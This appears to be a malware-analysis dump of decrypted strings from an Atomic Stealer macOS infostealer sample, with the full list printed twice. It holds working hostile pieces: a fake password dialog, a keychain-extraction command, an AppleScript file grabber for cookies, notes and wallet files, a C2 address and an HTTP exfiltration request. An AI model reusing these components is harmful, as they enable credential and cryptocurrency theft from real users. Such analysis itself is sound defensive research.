Syrion89/atomic_stealer_decrypted_strings_4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa.txt

## atomic_stealer_decrypted_strings_4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa.txt
[*] Decrypted String at 0x10003DFCA with key 0x77: 5.42.65.114
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-sto
[*] Decrypted String at 0x10003D02A with key 0x11: .DS_Store
[*] Decrypted String at 0x10003D042 with key 0x11: Partitions
[*] Decrypted String at 0x10003D05A with key 0x38: Code Cache
[*] Decrypted String at 0x10003D072 with key 0xc5: dscl . authonly "
[*] Decrypted String at 0x10003D092 with key 0xc5: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for
[*] Decrypted String at 0x10003D0FA with key 0xea: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'
[*] Decrypted String at 0x10003D1BA with key 0x7e: /Cookies
[*] Decrypted String at 0x10003D1D2 with key 0x7e: /Network/Cookies
[*] Decrypted String at 0x10003D1F2 with key 0xa1: /Login Data
[*] Decrypted String at 0x10003D20A with key 0xa1: /Web Data
[*] Decrypted String at 0x10003D222 with key 0x3b: ibnejdfjmmkpcnlpebklmnkoeoihofec
[*] Decrypted String at 0x10003D252 with key 0x3b: nkbihfbeogaeaoehlefnkodbefgpgknn
[*] Decrypted String at 0x10003D282 with key 0x5c: bocpokimicclpaiekenaeelehdjllofo
[*] Decrypted String at 0x10003D2B2 with key 0x5c: nphplpgoakhhjchkkhmiggakijnkhfnd
[*] Decrypted String at 0x10003D2E2 with key 0x66: pocmplpaccanhmnllbbkpgfliimjljgo
[*] Decrypted String at 0x10003D312 with key 0x66: mfhbebgoclkghebffdldpobeajmbecfk
[*] Decrypted String at 0x10003D342 with key 0x95: fhilaheimglignddkjgofkcbgekhenbh
[*] Decrypted String at 0x10003D372 with key 0x95: hnhobjmcibchnmglfbldbfabcgaknlkj
[*] Decrypted String at 0x10003D3A2 with key 0xb: apnehcjmnengpnmccpaibjmhhoadaico
[*] Decrypted String at 0x10003D3D2 with key 0xb: cjmkndjhnagcfbpiemnkdpomccnjblmj
[*] Decrypted String at 0x10003D402 with key 0x38: cmndjbecilbocjfkibfbifhngkdmjgog
[*] Decrypted String at 0x10003D432 with key 0x38: pnndplcbkakcplkjnolgbkdgjikjednm
[*] Decrypted String at 0x10003D462 with key 0xb3: dhgnlgphgchebgoemcjekedjjbifijid
[*] Decrypted String at 0x10003D492 with key 0xb3: fhbohimaelbohpjbbldcngcnapndodjp
[*] Decrypted String at 0x10003D4C2 with key 0xde: ffnbelfdoeiohenkjibnmadjiehjhajb
[*] Decrypted String at 0x10003D4F2 with key 0xde: afbcbjpbpfadlkmhmclhkeeodmamcflc
[*] Decrypted String at 0x10003D522 with key 0x60: hnfanknocfeofbddgcijnmhnfnkdnaad
[*] Decrypted String at 0x10003D552 with key 0x60: hpglfhgfnhbgpjdenjgmdgoeiappafln
[*] Decrypted String at 0x10003D5B2 with key 0x89: kncchdigobghenbbaddojjnnaogfppfj
[*] Decrypted String at 0x10003D5E2 with key 0xfb: amkmjjmmflddogmhpjloimipbofnfjih
[*] Decrypted String at 0x10003D612 with key 0xfb: nlbmnnijcnlegkjjpcfjclmcfggfefdm
[*] Decrypted String at 0x10003D642 with key 0x33: ppdadbejkmjnefldpcdjhnkpbjkikoip
[*] Decrypted String at 0x10003D672 with key 0x33: fnjhmkhhmkbjkkabndcnnogagogbneec
[*] Decrypted String at 0x10003D6A2 with key 0x90: cphhlgmgameodnhkjdmkpanlelnlohao
[*] Decrypted String at 0x10003D6D2 with key 0x90: nhnkbkgjikgcigadomkphalanndcapjk
[*] Decrypted String at 0x10003D702 with key 0xc5: kpfopkelmapcoipemfendmdcghnegimn
[*] Decrypted String at 0x10003D732 with key 0xc5: copjnifcecdedocejpaapepagaodgpbh
[*] Decrypted String at 0x10003D762 with key 0x29: aiifbnbfobpmeekipheeijimdpnlpgpp
[*] Decrypted String at 0x10003D792 with key 0x29: dmkamcknogkgcdfhhbddcghachkejeap
[*] Decrypted String at 0x10003D7C2 with key 0x5c: cnmamaachppnkjgnildpdmkaakejnhae
[*] Decrypted String at 0x10003D7F2 with key 0x5c: jojhfeoedkpkglbfimdfabpdfjaoolaf
[*] Decrypted String at 0x10003D822 with key 0xc5: flpiciilemghbmfalicajoolhkkenfel
[*] Decrypted String at 0x10003D852 with key 0xc5: nknhiehlklippafakaeklbeglecifhad
[*] Decrypted String at 0x10003D882 with key 0xf6: hcflpincpppdclinealmandijcmnkbgn
[*] Decrypted String at 0x10003D8B2 with key 0xf6: ookjlbkiijinhpmnjffcofjonbfbgaoc
[*] Decrypted String at 0x10003D8E2 with key 0xd1: mnfifefkajgofkcjkemidiaecocnkjeh
[*] Decrypted String at 0x10003D912 with key 0xd1: hmeobnfnfcmdkdcmlblgagmfpfboieaf
[*] Decrypted String at 0x10003D942 with key 0x11: dkdedlpgdmmkkfjabffeganieamfklkm
[*] Decrypted String at 0x10003D972 with key 0x11: nlgbhdfgdhgbiamfdfmbikcdghidoadd
[*] Decrypted String at 0x10003D9A2 with key 0x56: cihmoadaighcejopammfbmddcmdekcje
[*] Decrypted String at 0x10003D9D2 with key 0x56: lodccjjbdhfakaekdiahmedfbieldgik
[*] Decrypted String at 0x10003DA32 with key 0x93: klnaejjgbibmhlephnhpmaofohgkpgkd
[*] Decrypted String at 0x10003DA62 with key 0xde: aeachknmefphepccionboohckonoeemg
[*] Decrypted String at 0x10003DA92 with key 0xde: fnnegphlobjdpkhecapkijjdkgcjhkib
[*] Decrypted String at 0x10003DAC2 with key 0x1a: pdadjkfkgcafgbceimcpbkalnfnepbnk
[*] Decrypted String at 0x10003DAF2 with key 0x1a: acmacodkjbdgmoleeebolmdjonilkdbch
[*] Decrypted String at 0x10003DB22 with key 0x6b: bfnaelmomeimhlpmgjnjophhpkkoljpa
[*] Decrypted String at 0x10003DB52 with key 0x6b: cgeeodpfagjceefieflmdfphplkenlfk
[*] Decrypted String at 0x10003DB82 with key 0xa4: imloifkgjagghnncjkhggdhalmcnfklk
[*] Decrypted String at 0x10003DBB2 with key 0xa4: aholpfdialjgjfhomihkjbmgjidlcdno
[*] Decrypted String at 0x10003DBE2 with key 0xe7: egjidjbpglichdcondbcbdnbeeppgdph
[*] Decrypted String at 0x10003DC12 with key 0xe7: efbglgofoippbgcjepnhiblaibcnclgk
[*] Decrypted String at 0x10003DC42 with key 0x2f: opcgpfmipidbgpenhmajoajpbobppdil
[*] Decrypted String at 0x10003DC72 with key 0x2f: hifafgmccdpekplomjjkcfgodnhcellj
[*] Decrypted String at 0x10003DCA2 with key 0x5c: ojggmchlghnjlapmfbnjholfjkiidbch
[*] Decrypted String at 0x10003DCD2 with key 0x5c: jnlgamecbpmbajjfhmmmlhejkemejdma
[*] Decrypted String at 0x10003DD02 with key 0xa1: dlcobpjiigpikoobohmabehhmhfoodbb
[*] Decrypted String at 0x10003DD32 with key 0xa1: ebfidpplhabeedpnhjnobghokpiioolj
[*] Decrypted String at 0x10003DD62 with key 0xd4: loinekcabhlmhjjbocijdoimmejangoa
[*] Decrypted String at 0x10003DD92 with key 0xd4: ejjladinnckdgjemekebdpeokbikhfci
[*] Decrypted String at 0x10003DDC2 with key 0x18: phkbamefinggmakgklpkljjmgibohnba
[*] Decrypted String at 0x10003DDF2 with key 0x18: ppbibelpcjmhbdihakflkdcoccbgbkpo
[*] Decrypted String at 0x10003DE22 with key 0x51: Chromium/
[*] Decrypted String at 0x10003DE3A with key 0x92: Snapshots
[*] Decrypted String at 0x10003DE52 with key 0x3e: /Local Extension Settings/
[*] Decrypted String at 0x10003DE7A with key 0x3e: /cookies.sqlite
[*] Decrypted String at 0x10003DE9A with key 0x8d: /formhistory.sqlite
[*] Decrypted String at 0x10003DEBA with key 0x8d: /key4.db
[*] Decrypted String at 0x10003DED2 with key 0xa2: /logins.json
[*] Decrypted String at 0x10003DEEA with key 0xef: security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'
[*] Decrypted String at 0x10003DF4A with key 0xef: masterpass-chrome
[*] Decrypted String at 0x10003DF6A with key 0xb: POST /p2p HTTP/1.1
Host:
[*] Decrypted String at 0x10003DF92 with key 0xb: :80
uuid:
[*] Decrypted String at 0x10003DFAA with key 0x56:
Content-Length:
[*] Decrypted String at 0x10003DFE2 with key 0x77: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:"
set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"}
set bankSize to 0
tell application "Finder"
    set username to short user name of (system info)
    try

[*] Decrypted String at 0x10003E0FA  with key 0xc0: if not (exists folder destinationFolderPath) then
            make new folder at (path to home folder) with properties {name:"fg"}
        end if
        set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
        try
            duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
        end try
        set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
        try

[*] Decrypted String at 0x10003E33A with key 0xc0: set notesFolder to folder notesFolderPath
            set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder
            repeat with aFile in notesFiles
                set fileSize to size of aFile
                if (bankSize + fileSize) 10 * 1024 * 1024 then
                    try
                        duplicate aFile to folder destinationFolderPath with replacing
                        set bankSize to bankSize + fileSize
                    end try
                else
                    exit repeat
                end if
            end repeat

[*] Decrypted String at 0x10003E5CA with key 0xd4: end try
        set desktopFiles to every file of desktop
        set documentsFiles to every file of folder "Documents" of (path to home folder)
        repeat with aFile in (desktopFiles & documentsFiles)
            set fileExtension to name extension of aFile
            if fileExtension is in extensionsList then
                set fileSize to size of aFile
                if (bankSize + fileSize)  10 * 1024 * 1024 then
                    try
                        duplicate aFile to folder destinationFolderPath with replacing
                        set bankSize to bankSize + fileSize
                    end try
                else
                    exit repeat
                end if
            end if
        end repeat
    end try
end tell'
[*] Decrypted String at 0x10003E8EA with key 0x2c: FileGrabber/
[*] Decrypted String at 0x10003E902 with key 0x29: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
[*] Decrypted String at 0x10003E95A with key 0x7e: /Library/Application Support/
[*] Decrypted String at 0x10003E982 with key 0x7e: /Library/Cookies/Cookies.binarycookies
[*] Decrypted String at 0x10003E9BA with key 0x81: safari/saf1
[*] Decrypted String at 0x10003E9D2 with key 0x81: /.config/filezilla/recentservers.xml
[*] Decrypted String at 0x10003EA02 with key 0xd4: FileZilla/recentservers.xml
[*] Decrypted String at 0x10003EA2A with key 0xd4: Chrome
[*] Decrypted String at 0x10003EA42 with key 0xdd: Google/Chrome/
[*] Decrypted String at 0x10003EA62 with key 0x2f: BraveSoftware/Brave-Browser/
[*] Decrypted String at 0x10003EA8A with key 0xab: Microsoft Edge/
[*] Decrypted String at 0x10003EAAA with key 0xb: com.operasoftware.Opera/
[*] Decrypted String at 0x10003EAD2 with key 0xef: com.operasoftware.OperaGX/
[*] Decrypted String at 0x10003EAFA with key 0x4d: Vivaldi/
[*] Decrypted String at 0x10003EB12 with key 0x38: /Library/Application Support/
[*] Decrypted String at 0x10003EB3A with key 0x38: Firefox/Profiles/
[*] Decrypted String at 0x10003EB5A with key 0x93: /Library/Keychains/login.keychain-db
[*] Decrypted String at 0x10003EB8A with key 0x93: keychain
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-store.json
[*] Decrypted String at 0x10003EBCA with key 0x84: deskwallets/Binance/app-store.json
[*] Decrypted String at 0x10003EBFA with key 0xdd: deskwallets/Electrum/
[*] Decrypted String at 0x10003EC1A with key 0xdd: /.electrum/wallets/
[*] Decrypted String at 0x10003EC3A with key 0xc2: deskwallets/Coinomi/
[*] Decrypted String at 0x10003EC5A with key 0xc2: Coinomi/wallets/
[*] Decrypted String at 0x10003EC7A with key 0x2a: deskwallets/Exodus/
[*] Decrypted String at 0x10003EC9A with key 0xf6: deskwallets/Atomic/
[*] Decrypted String at 0x10003ECBA with key 0xf6: atomic/Local Storage/leveldb/
[*] Decrypted String at 0x10003ECE2 with key 0x5c: tell application
[*] Decrypted String at 0x10003ED02 with key 0x5c: "Terminal" to close first
	[*] Decrypted String at 0x10003DFCA with key 0x77: 5.42.65.114
	[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-sto
	[*] Decrypted String at 0x10003D02A with key 0x11: .DS_Store
	[*] Decrypted String at 0x10003D042 with key 0x11: Partitions
	[*] Decrypted String at 0x10003D05A with key 0x38: Code Cache
	[*] Decrypted String at 0x10003D072 with key 0xc5: dscl . authonly "
	[*] Decrypted String at 0x10003D092 with key 0xc5: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for
	[*] Decrypted String at 0x10003D0FA with key 0xea: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'
	[*] Decrypted String at 0x10003D1BA with key 0x7e: /Cookies
	[*] Decrypted String at 0x10003D1D2 with key 0x7e: /Network/Cookies
	[*] Decrypted String at 0x10003D1F2 with key 0xa1: /Login Data
	[*] Decrypted String at 0x10003D20A with key 0xa1: /Web Data
	[*] Decrypted String at 0x10003D222 with key 0x3b: ibnejdfjmmkpcnlpebklmnkoeoihofec
	[*] Decrypted String at 0x10003D252 with key 0x3b: nkbihfbeogaeaoehlefnkodbefgpgknn
	[*] Decrypted String at 0x10003D282 with key 0x5c: bocpokimicclpaiekenaeelehdjllofo
	[*] Decrypted String at 0x10003D2B2 with key 0x5c: nphplpgoakhhjchkkhmiggakijnkhfnd
	[*] Decrypted String at 0x10003D2E2 with key 0x66: pocmplpaccanhmnllbbkpgfliimjljgo
	[*] Decrypted String at 0x10003D312 with key 0x66: mfhbebgoclkghebffdldpobeajmbecfk
	[*] Decrypted String at 0x10003D342 with key 0x95: fhilaheimglignddkjgofkcbgekhenbh
	[*] Decrypted String at 0x10003D372 with key 0x95: hnhobjmcibchnmglfbldbfabcgaknlkj
	[*] Decrypted String at 0x10003D3A2 with key 0xb: apnehcjmnengpnmccpaibjmhhoadaico
	[*] Decrypted String at 0x10003D3D2 with key 0xb: cjmkndjhnagcfbpiemnkdpomccnjblmj
	[*] Decrypted String at 0x10003D402 with key 0x38: cmndjbecilbocjfkibfbifhngkdmjgog
	[*] Decrypted String at 0x10003D432 with key 0x38: pnndplcbkakcplkjnolgbkdgjikjednm
	[*] Decrypted String at 0x10003D462 with key 0xb3: dhgnlgphgchebgoemcjekedjjbifijid
	[*] Decrypted String at 0x10003D492 with key 0xb3: fhbohimaelbohpjbbldcngcnapndodjp
	[*] Decrypted String at 0x10003D4C2 with key 0xde: ffnbelfdoeiohenkjibnmadjiehjhajb
	[*] Decrypted String at 0x10003D4F2 with key 0xde: afbcbjpbpfadlkmhmclhkeeodmamcflc
	[*] Decrypted String at 0x10003D522 with key 0x60: hnfanknocfeofbddgcijnmhnfnkdnaad
	[*] Decrypted String at 0x10003D552 with key 0x60: hpglfhgfnhbgpjdenjgmdgoeiappafln
	[*] Decrypted String at 0x10003D5B2 with key 0x89: kncchdigobghenbbaddojjnnaogfppfj
	[*] Decrypted String at 0x10003D5E2 with key 0xfb: amkmjjmmflddogmhpjloimipbofnfjih
	[*] Decrypted String at 0x10003D612 with key 0xfb: nlbmnnijcnlegkjjpcfjclmcfggfefdm
	[*] Decrypted String at 0x10003D642 with key 0x33: ppdadbejkmjnefldpcdjhnkpbjkikoip
	[*] Decrypted String at 0x10003D672 with key 0x33: fnjhmkhhmkbjkkabndcnnogagogbneec
	[*] Decrypted String at 0x10003D6A2 with key 0x90: cphhlgmgameodnhkjdmkpanlelnlohao
	[*] Decrypted String at 0x10003D6D2 with key 0x90: nhnkbkgjikgcigadomkphalanndcapjk
	[*] Decrypted String at 0x10003D702 with key 0xc5: kpfopkelmapcoipemfendmdcghnegimn
	[*] Decrypted String at 0x10003D732 with key 0xc5: copjnifcecdedocejpaapepagaodgpbh
	[*] Decrypted String at 0x10003D762 with key 0x29: aiifbnbfobpmeekipheeijimdpnlpgpp
	[*] Decrypted String at 0x10003D792 with key 0x29: dmkamcknogkgcdfhhbddcghachkejeap
	[*] Decrypted String at 0x10003D7C2 with key 0x5c: cnmamaachppnkjgnildpdmkaakejnhae
	[*] Decrypted String at 0x10003D7F2 with key 0x5c: jojhfeoedkpkglbfimdfabpdfjaoolaf
	[*] Decrypted String at 0x10003D822 with key 0xc5: flpiciilemghbmfalicajoolhkkenfel
	[*] Decrypted String at 0x10003D852 with key 0xc5: nknhiehlklippafakaeklbeglecifhad
	[*] Decrypted String at 0x10003D882 with key 0xf6: hcflpincpppdclinealmandijcmnkbgn
	[*] Decrypted String at 0x10003D8B2 with key 0xf6: ookjlbkiijinhpmnjffcofjonbfbgaoc
	[*] Decrypted String at 0x10003D8E2 with key 0xd1: mnfifefkajgofkcjkemidiaecocnkjeh
	[*] Decrypted String at 0x10003D912 with key 0xd1: hmeobnfnfcmdkdcmlblgagmfpfboieaf
	[*] Decrypted String at 0x10003D942 with key 0x11: dkdedlpgdmmkkfjabffeganieamfklkm
	[*] Decrypted String at 0x10003D972 with key 0x11: nlgbhdfgdhgbiamfdfmbikcdghidoadd
	[*] Decrypted String at 0x10003D9A2 with key 0x56: cihmoadaighcejopammfbmddcmdekcje
	[*] Decrypted String at 0x10003D9D2 with key 0x56: lodccjjbdhfakaekdiahmedfbieldgik
	[*] Decrypted String at 0x10003DA32 with key 0x93: klnaejjgbibmhlephnhpmaofohgkpgkd
	[*] Decrypted String at 0x10003DA62 with key 0xde: aeachknmefphepccionboohckonoeemg
	[*] Decrypted String at 0x10003DA92 with key 0xde: fnnegphlobjdpkhecapkijjdkgcjhkib
	[*] Decrypted String at 0x10003DAC2 with key 0x1a: pdadjkfkgcafgbceimcpbkalnfnepbnk
	[*] Decrypted String at 0x10003DAF2 with key 0x1a: acmacodkjbdgmoleeebolmdjonilkdbch
	[*] Decrypted String at 0x10003DB22 with key 0x6b: bfnaelmomeimhlpmgjnjophhpkkoljpa
	[*] Decrypted String at 0x10003DB52 with key 0x6b: cgeeodpfagjceefieflmdfphplkenlfk
	[*] Decrypted String at 0x10003DB82 with key 0xa4: imloifkgjagghnncjkhggdhalmcnfklk
	[*] Decrypted String at 0x10003DBB2 with key 0xa4: aholpfdialjgjfhomihkjbmgjidlcdno
	[*] Decrypted String at 0x10003DBE2 with key 0xe7: egjidjbpglichdcondbcbdnbeeppgdph
	[*] Decrypted String at 0x10003DC12 with key 0xe7: efbglgofoippbgcjepnhiblaibcnclgk
	[*] Decrypted String at 0x10003DC42 with key 0x2f: opcgpfmipidbgpenhmajoajpbobppdil
	[*] Decrypted String at 0x10003DC72 with key 0x2f: hifafgmccdpekplomjjkcfgodnhcellj
	[*] Decrypted String at 0x10003DCA2 with key 0x5c: ojggmchlghnjlapmfbnjholfjkiidbch
	[*] Decrypted String at 0x10003DCD2 with key 0x5c: jnlgamecbpmbajjfhmmmlhejkemejdma
	[*] Decrypted String at 0x10003DD02 with key 0xa1: dlcobpjiigpikoobohmabehhmhfoodbb
	[*] Decrypted String at 0x10003DD32 with key 0xa1: ebfidpplhabeedpnhjnobghokpiioolj
	[*] Decrypted String at 0x10003DD62 with key 0xd4: loinekcabhlmhjjbocijdoimmejangoa
	[*] Decrypted String at 0x10003DD92 with key 0xd4: ejjladinnckdgjemekebdpeokbikhfci
	[*] Decrypted String at 0x10003DDC2 with key 0x18: phkbamefinggmakgklpkljjmgibohnba
	[*] Decrypted String at 0x10003DDF2 with key 0x18: ppbibelpcjmhbdihakflkdcoccbgbkpo
	[*] Decrypted String at 0x10003DE22 with key 0x51: Chromium/
	[*] Decrypted String at 0x10003DE3A with key 0x92: Snapshots
	[*] Decrypted String at 0x10003DE52 with key 0x3e: /Local Extension Settings/
	[*] Decrypted String at 0x10003DE7A with key 0x3e: /cookies.sqlite
	[*] Decrypted String at 0x10003DE9A with key 0x8d: /formhistory.sqlite
	[*] Decrypted String at 0x10003DEBA with key 0x8d: /key4.db
	[*] Decrypted String at 0x10003DED2 with key 0xa2: /logins.json
	[*] Decrypted String at 0x10003DEEA with key 0xef: security 2>&1 > /dev/null find-generic-password -ga 'Chrome' \| awk '{print $2}'
	[*] Decrypted String at 0x10003DF4A with key 0xef: masterpass-chrome
	[*] Decrypted String at 0x10003DF6A with key 0xb: POST /p2p HTTP/1.1
	Host:
	[*] Decrypted String at 0x10003DF92 with key 0xb: :80
	uuid:
	[*] Decrypted String at 0x10003DFAA with key 0x56:
	Content-Length:
	[*] Decrypted String at 0x10003DFE2 with key 0x77: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:"
	set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"}
	set bankSize to 0
	tell application "Finder"
	set username to short user name of (system info)
	try

	[*] Decrypted String at 0x10003E0FA with key 0xc0: if not (exists folder destinationFolderPath) then
	make new folder at (path to home folder) with properties {name:"fg"}
	end if
	set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
	try
	duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
	end try
	set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
	try

	[*] Decrypted String at 0x10003E33A with key 0xc0: set notesFolder to folder notesFolderPath
	set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder
	repeat with aFile in notesFiles
	set fileSize to size of aFile
	if (bankSize + fileSize) 10 * 1024 * 1024 then
	try
	duplicate aFile to folder destinationFolderPath with replacing
	set bankSize to bankSize + fileSize
	end try
	else
	exit repeat
	end if
	end repeat

	[*] Decrypted String at 0x10003E5CA with key 0xd4: end try
	set desktopFiles to every file of desktop
	set documentsFiles to every file of folder "Documents" of (path to home folder)
	repeat with aFile in (desktopFiles & documentsFiles)
	set fileExtension to name extension of aFile
	if fileExtension is in extensionsList then
	set fileSize to size of aFile
	if (bankSize + fileSize) 10 * 1024 * 1024 then
	try
	duplicate aFile to folder destinationFolderPath with replacing
	set bankSize to bankSize + fileSize
	end try
	else
	exit repeat
	end if
	end if
	end repeat
	end try
	end tell'
	[*] Decrypted String at 0x10003E8EA with key 0x2c: FileGrabber/
	[*] Decrypted String at 0x10003E902 with key 0x29: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
	[*] Decrypted String at 0x10003E95A with key 0x7e: /Library/Application Support/
	[*] Decrypted String at 0x10003E982 with key 0x7e: /Library/Cookies/Cookies.binarycookies
	[*] Decrypted String at 0x10003E9BA with key 0x81: safari/saf1
	[*] Decrypted String at 0x10003E9D2 with key 0x81: /.config/filezilla/recentservers.xml
	[*] Decrypted String at 0x10003EA02 with key 0xd4: FileZilla/recentservers.xml
	[*] Decrypted String at 0x10003EA2A with key 0xd4: Chrome
	[*] Decrypted String at 0x10003EA42 with key 0xdd: Google/Chrome/
	[*] Decrypted String at 0x10003EA62 with key 0x2f: BraveSoftware/Brave-Browser/
	[*] Decrypted String at 0x10003EA8A with key 0xab: Microsoft Edge/
	[*] Decrypted String at 0x10003EAAA with key 0xb: com.operasoftware.Opera/
	[*] Decrypted String at 0x10003EAD2 with key 0xef: com.operasoftware.OperaGX/
	[*] Decrypted String at 0x10003EAFA with key 0x4d: Vivaldi/
	[*] Decrypted String at 0x10003EB12 with key 0x38: /Library/Application Support/
	[*] Decrypted String at 0x10003EB3A with key 0x38: Firefox/Profiles/
	[*] Decrypted String at 0x10003EB5A with key 0x93: /Library/Keychains/login.keychain-db
	[*] Decrypted String at 0x10003EB8A with key 0x93: keychain
	[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-store.json
	[*] Decrypted String at 0x10003EBCA with key 0x84: deskwallets/Binance/app-store.json
	[*] Decrypted String at 0x10003EBFA with key 0xdd: deskwallets/Electrum/
	[*] Decrypted String at 0x10003EC1A with key 0xdd: /.electrum/wallets/
	[*] Decrypted String at 0x10003EC3A with key 0xc2: deskwallets/Coinomi/
	[*] Decrypted String at 0x10003EC5A with key 0xc2: Coinomi/wallets/
	[*] Decrypted String at 0x10003EC7A with key 0x2a: deskwallets/Exodus/
	[*] Decrypted String at 0x10003EC9A with key 0xf6: deskwallets/Atomic/
	[*] Decrypted String at 0x10003ECBA with key 0xf6: atomic/Local Storage/leveldb/
	[*] Decrypted String at 0x10003ECE2 with key 0x5c: tell application
	[*] Decrypted String at 0x10003ED02 with key 0x5c: "Terminal" to close first